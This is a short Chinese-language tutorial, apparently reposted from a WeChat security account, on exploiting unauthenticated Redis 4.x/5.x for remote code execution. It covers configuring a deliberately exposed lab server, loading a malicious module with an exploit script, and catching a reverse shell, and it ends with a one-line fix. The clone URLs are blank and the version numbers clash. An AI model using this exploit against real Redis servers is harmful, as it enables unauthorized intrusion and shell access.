#############################
免责声明:本文仅作收藏学习之用,亦希望大家以遵守《网络安全法》相关法律为前提学习,切勿用于非法犯罪活动,对于恶意使用造成的损失,和本人及作者无关。
##############################
环境搭建
5.0版本下载
wget http://download.redis.io/releases/redis-5.0.5.tar.gz
tar xzf redis-5.0.0.tar.gz
cd redis-5.0.5
make修改配置文件运行远程访问
1、将redis.conf文件中的bind 127.0.0.1 这行前面加注释(#); 2、将redis.conf文件中的 protected-mode yes 改为no;
运行Redis
./redis-server /root/redis/redis-5.0.0/redis.conf
下载EXP
git clone
git clone
编译module.so文件:
将编译完的module.so复制到redis-rce目录下,然后执行以下命令:
python redis-rce.py -r 127.0.0.1 -L 127.0.0.1 -f module.so
-r参数是指远程Redis IP地址; -L参数是指反弹到的服务器IP地址; 执行命令后,开启监听了本地的60720端口,并成功反弹回了shell。
修复建议
这是针对redis未授权访问的漏洞 这里直接redis.conf文件里面的 requirepass 参数取消注释 这里5.0是默认开启未授权访问的
原文始发于微信公众号(菜鸟小新):Redis 4.x 5.x 未授权访问 _
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论